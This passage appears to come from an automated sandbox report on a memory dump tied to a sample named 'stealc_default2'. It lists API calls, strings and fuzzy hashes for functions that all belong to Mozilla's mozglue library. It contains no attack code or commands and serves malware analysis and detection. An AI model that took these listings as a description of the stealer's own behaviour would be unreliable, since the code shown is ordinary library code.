RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C0D3CCC), ref: 6C0D40C2
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C0D4134
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C0D3CCC), ref: 6C0D4143
RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C0D3CCC), ref: 6C0D4157

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Free$Heap$StringUnicode$Allocate
String ID:
API String ID: 3680524765-0
Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction ID: d8c303dc517aee4158334cf042ef4e51cbb145f485e1a4b8baa52b94734f7fff
Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
Instruction Fuzzy Hash: EEA17DB5A00315DFEB40CF68C880759BBF5BF48308F2645A9D909AF752D771E886CBA0

Function 6C0C2030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,6C0E3F47,?,?,?,6C0E3F47,6C0E1A70,?), ref: 6C0C207F
memset.VCRUNTIME140(?,000000E5,6C0E3F47,?,6C0E3F47,6C0E1A70,?), ref: 6C0C20DD
VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C0E3F47,6C0E1A70,?), ref: 6C0C211A
EnterCriticalSection.KERNEL32(6C14E744,?,6C0E3F47,6C0E1A70,?), ref: 6C0C2145
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C0E3F47,6C0E1A70,?), ref: 6C0C21BA
EnterCriticalSection.KERNEL32(6C14E744,?,6C0E3F47,6C0E1A70,?), ref: 6C0C21E0
LeaveCriticalSection.KERNEL32(6C14E744,?,6C0E3F47,6C0E1A70,?), ref: 6C0C2232

Strings

MOZ_CRASH(), xrefs: 6C0C227D
MOZ_RELEASE_ASSERT(node->mArena == this), xrefs: 6C0C2253, 6C0C2268

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
API String ID: 889484744-884734703
Opcode ID: 4f2f6bb2e50e8b1cdb01760e79ce8ac44b90daf1c7d9cc0c36749c8782283eb3
Instruction ID: f91916413883a7c186c7179f56c1786ab3b723c603ff787fa9ea7d544f09ef5d
Opcode Fuzzy Hash: 4f2f6bb2e50e8b1cdb01760e79ce8ac44b90daf1c7d9cc0c36749c8782283eb3
Instruction Fuzzy Hash: E761D631F002168FCB04DA68C989B6E77F1AF95728F259135EA24A7F94D7709D00DB92

Function 6C0C48E0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(8E8DFFFF,?,6C10483A,?), ref: 6C0C4ACB
memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6C10483A,?), ref: 6C0C4AE0
moz_xmalloc.MOZGLUE(FFFE15BF,?,6C10483A,?), ref: 6C0C4A82

Part of subcall function 6C0DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C0DCAA2

memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6C10483A,?), ref: 6C0C4A97
moz_xmalloc.MOZGLUE(15D4E801,?,6C10483A,?), ref: 6C0C4A35

Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26

memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6C10483A,?), ref: 6C0C4A4A
moz_xmalloc.MOZGLUE(15D4E824,?,6C10483A,?), ref: 6C0C4AF4
moz_xmalloc.MOZGLUE(FFFE15E2,?,6C10483A,?), ref: 6C0C4B10
moz_xmalloc.MOZGLUE(8E8E0022,?,6C10483A,?), ref: 6C0C4B2C

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
String ID:
API String ID: 4251373892-0
Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction ID: fe63e314c868db66968ee45f6e4eb22243c59c2cefd34d027eb74133bd80af58
Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction Fuzzy Hash: E5717AB1A007069FCB14CFA8C480AAAB7F4FF08308B54463EE55A9BB41E731F655CB81

Function 6C119D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C118273), ref: 6C119D65
free.MOZGLUE(6C118273,?), ref: 6C119D7C
free.MOZGLUE(?,?), ref: 6C119D92
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C119E0F
free.MOZGLUE(6C11946B,?,?), ref: 6C119E24
free.MOZGLUE(?,?,?), ref: 6C119E3A
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C119EC8
free.MOZGLUE(6C11946B,?,?,?), ref: 6C119EDF
free.MOZGLUE(?,?,?,?), ref: 6C119EF5

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 8abf0dbe87e6c033e12039febb457a01c75cd872db69c9118b45de35a095e472
Instruction ID: b9a39c46868196a40902215cdeb1979cbf1f106861a96dd1ede54efcb2d7d4be
Opcode Fuzzy Hash: 8abf0dbe87e6c033e12039febb457a01c75cd872db69c9118b45de35a095e472
Instruction Fuzzy Hash: 39719E7490AB418FD716CF18C49065BF3F4FF99315B448A69E85A9BB01EB34F885CB81

Function 6C11DDC0 Relevance: 13.7, APIs: 9, Instructions: 152COMMON

Download Yara Rule

APIs

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C11DDCF

Part of subcall function 6C0FFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0FFA4B

Part of subcall function 6C1190E0: free.MOZGLUE(?,00000000,?,?,6C11DEDB), ref: 6C1190FF
Part of subcall function 6C1190E0: free.MOZGLUE(?,00000000,?,?,6C11DEDB), ref: 6C119108

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C11DE0D
free.MOZGLUE(00000000), ref: 6C11DE41
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C11DE5F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C11DEA3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C11DEE9
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C10DEFD,?,6C0D4A68), ref: 6C11DF32

Part of subcall function 6C11DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C11DB86
Part of subcall function 6C11DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C11DC0E

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C10DEFD,?,6C0D4A68), ref: 6C11DF65
free.MOZGLUE(?), ref: 6C11DF80

Part of subcall function 6C0E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0E5EDB
Part of subcall function 6C0E5E90: memset.VCRUNTIME140(6C127765,000000E5,55CCCCCC), ref: 6C0E5F27
Part of subcall function 6C0E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0E5FB2

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
String ID:
API String ID: 112305417-0
Opcode ID: 39a708c98242ac0c4d2bc6e1a7edd80eba5d53541a4cdf91f8ec6a7b78032563
Instruction ID: a4a27a4c7d277a4bf8ccd5aa8fcdaf037783c1073c552e2ec37b97cdf6a587e6
Opcode Fuzzy Hash: 39a708c98242ac0c4d2bc6e1a7edd80eba5d53541a4cdf91f8ec6a7b78032563
Instruction Fuzzy Hash: 1351FE7660A6119FD712AB18C8803AE73B2BFA5309F56053CD51653F00D739F91ACB82

Function 6C125D10 Relevance: 13.6, APIs: 9, Instructions: 126COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C125C8C,?,6C0FE829), ref: 6C125D32
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C125C8C,?,6C0FE829), ref: 6C125D62
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C125C8C,?,6C0FE829), ref: 6C125D6D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C125C8C,?,6C0FE829), ref: 6C125D84
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C125C8C,?,6C0FE829), ref: 6C125DA4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C125C8C,?,6C0FE829), ref: 6C125DC9
std::_Facet_Register.LIBCPMT ref: 6C125DDB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C125C8C,?,6C0FE829), ref: 6C125E00
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C125C8C,?,6C0FE829), ref: 6C125E45

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: 7631316ed9de4b4fc29765daeffef5986dc70dd489ff6cd140d4567289b57cc4
Instruction ID: d4ceccb469e08bfbdd11d3d89a2db521735212b6c85cc51b853203ad6b7db7b0
Opcode Fuzzy Hash: 7631316ed9de4b4fc29765daeffef5986dc70dd489ff6cd140d4567289b57cc4
Instruction Fuzzy Hash: 444192747002089FCB00EFA5C8D8AAEB7B5EF89358F444068D50A9B781EB38EC45DF51

Function 6C0FCC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C0C31A7), ref: 6C0FCDDD

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C0FCFA4, 6C0FCFB8
<jemalloc>, xrefs: 6C0FCF9F, 6C0FCFB3

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: 568f1384b8658bcccef48efe3d04da13b83c320a4d0a7209998d99f8e56d1140
Instruction ID: 45f8a33a49244b668a84c085e3faa818f53668978032552990adb197d3affd70
Opcode Fuzzy Hash: 568f1384b8658bcccef48efe3d04da13b83c320a4d0a7209998d99f8e56d1140
Instruction Fuzzy Hash: 5231A5317412155BFF24AF658C46BAEBBF5AF81718F308018FA25ABAC0DB70D5458BA1

Function 6C0CBAE0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C0CBC03
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C0CBD06

Strings

0, xrefs: 6C0CBC74
0, xrefs: 6C0CBBCD
y, xrefs: 6C0CBC4E

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0$0$y
API String ID: 2811501404-3020536412
Opcode ID: 400dbba25539b017b9c20458a9edfe51bbda5fc4427db55cb28ffb598ae8eb0c
Instruction ID: f7d9914948d43335f860009f00260e22205bfdd5e043c316c40e35fc2d8db84f
Opcode Fuzzy Hash: 400dbba25539b017b9c20458a9edfe51bbda5fc4427db55cb28ffb598ae8eb0c
Instruction Fuzzy Hash: E361B171B087458FC710CF28C481B5FB7E5AF99348F004A2DE889A7651EB71E9498B93

Function 6C0CECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0CF100: LoadLibraryW.KERNEL32(shell32,?,6C13D020), ref: 6C0CF122
Part of subcall function 6C0CF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C0CF132

moz_xmalloc.MOZGLUE(00000012), ref: 6C0CED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0CEDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C0CEDCC
CreateFileW.KERNEL32 ref: 6C0CEE08
free.MOZGLUE(00000000), ref: 6C0CEE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C0CEE32

Part of subcall function 6C0CEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C0CEBB5
Part of subcall function 6C0CEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C0FD7F3), ref: 6C0CEBC3
Part of subcall function 6C0CEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C0FD7F3), ref: 6C0CEBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C0CEDC1

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: a6b5dba72b36f75917e354571a51cff69a60bdb9527d894cda6c814805257327
Instruction ID: 6e3ef64cba0f2a60c9b592b5309f3ee40dbfc31002be0ebdca710839773ec4fa
Opcode Fuzzy Hash: a6b5dba72b36f75917e354571a51cff69a60bdb9527d894cda6c814805257327
Instruction Fuzzy Hash: 02519E71E052148BDB10EF68C8427AEB7F1AF5935CF44852DE8656B780E730A988C7A3

Function 6C0D0A60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000000C,?,6C12B80C,00000000,?,?,6C0D003B,?), ref: 6C0D0A72

Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26

moz_xmalloc.MOZGLUE(?,?,6C12B80C,00000000,?,?,6C0D003B,?), ref: 6C0D0AF5
free.MOZGLUE(00000000,?,?,6C12B80C,00000000,?,?,6C0D003B,?), ref: 6C0D0B9F
free.MOZGLUE(?,?,?,6C12B80C,00000000,?,?,6C0D003B,?), ref: 6C0D0BDB
free.MOZGLUE(00000000,?,?,6C12B80C,00000000,?,?,6C0D003B,?), ref: 6C0D0BED
mozalloc_abort.MOZGLUE(alloc overflow,?,6C12B80C,00000000,?,?,6C0D003B,?), ref: 6C0D0C0A

Strings

alloc overflow, xrefs: 6C0D0C05

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: free$moz_xmalloc$mallocmozalloc_abort
String ID: alloc overflow
API String ID: 1471638834-749304246
Opcode ID: 026d639db108f7be8a2b0bab67fd5b845dbb273276d003be0f6772fe22eccf69
Instruction ID: 7a755dc1e8651310c34de533bb147670eff377f971d1442c4a5910f90ca4c664
Opcode Fuzzy Hash: 026d639db108f7be8a2b0bab67fd5b845dbb273276d003be0f6772fe22eccf69
Instruction Fuzzy Hash: 77519DB4A083468FDB14CF18D880B6EB3F5EF4830CF56496EC85A9BA01EB71B544CB51

Function 6C13A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C13A565

Part of subcall function 6C13A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C13A4BE
Part of subcall function 6C13A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C13A4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C13A65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C13A6B6

Strings

z, xrefs: 6C13A6AE
0, xrefs: 6C13A5FB

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: e76e90bc48b3321f1ed9a4730288cc6edbf6f883e900e33779ccba17a6fd49b0
Instruction ID: 58978984a5253fb360e090f6b6cb19bfcf4cdd748123fd399b107a4a11923448
Opcode Fuzzy Hash: e76e90bc48b3321f1ed9a4730288cc6edbf6f883e900e33779ccba17a6fd49b0
Instruction Fuzzy Hash: D34138B1A097459FC741DF68C080A9FBBF4BF89358F409A2EF49987650E730E549CB92

Function 6C0C78C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,6C14008B), ref: 6C0C7B89
free.MOZGLUE(?,6C14008B), ref: 6C0C7BAC

Part of subcall function 6C0C78C0: free.MOZGLUE(?,6C14008B), ref: 6C0C7BCF

free.MOZGLUE(?,6C14008B), ref: 6C0C7BF2

Part of subcall function 6C0E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0E5EDB
Part of subcall function 6C0E5E90: memset.VCRUNTIME140(6C127765,000000E5,55CCCCCC), ref: 6C0E5F27
Part of subcall function 6C0E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0E5FB2

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: free$CriticalSection$EnterLeavememset
String ID:
API String ID: 3977402767-0
Opcode ID: 4fa535613560ff5f79ca5d54c09e4038f6441155e1ddc2d111320562ee61df53
Instruction ID: 6303872fcafe36275c6b5d5105c58a20c5f5624ac4a7d07359679d9d373ad57a
Opcode Fuzzy Hash: 4fa535613560ff5f79ca5d54c09e4038f6441155e1ddc2d111320562ee61df53
Instruction Fuzzy Hash: 7FC19331F011288BEB248B2CDC90B9DB7F2AF45318F1546E9D51AA7BC1D731AE858F52

Function 6C109420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C0FAB89: EnterCriticalSection.KERNEL32(6C14E370,?,?,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB94
Part of subcall function 6C0FAB89: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
__Init_thread_footer.LIBCMT ref: 6C10949F

Strings

MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C10946B
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C109459
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C10947D

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 8d912ee5d070b291494cacd2dc801cc84a23bd3f12e6baa7421c5b9dc119b1c3
Instruction ID: 131f825945b2e8d04817fffaa29d3cd136fd07c4b6b28654dae1d7a647e8f89d
Opcode Fuzzy Hash: 8d912ee5d070b291494cacd2dc801cc84a23bd3f12e6baa7421c5b9dc119b1c3
Instruction Fuzzy Hash: 48019C38B0010087D700AB5CD934A4633B49B0137EF19C537EC16C3B41EE35E4658957

Function 6C111220 Relevance: 12.2, APIs: 8, Instructions: 173threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C11124B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C111268
GetCurrentThreadId.KERNEL32 ref: 6C1112DA
InitializeConditionVariable.KERNEL32(?), ref: 6C11134A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C11138A
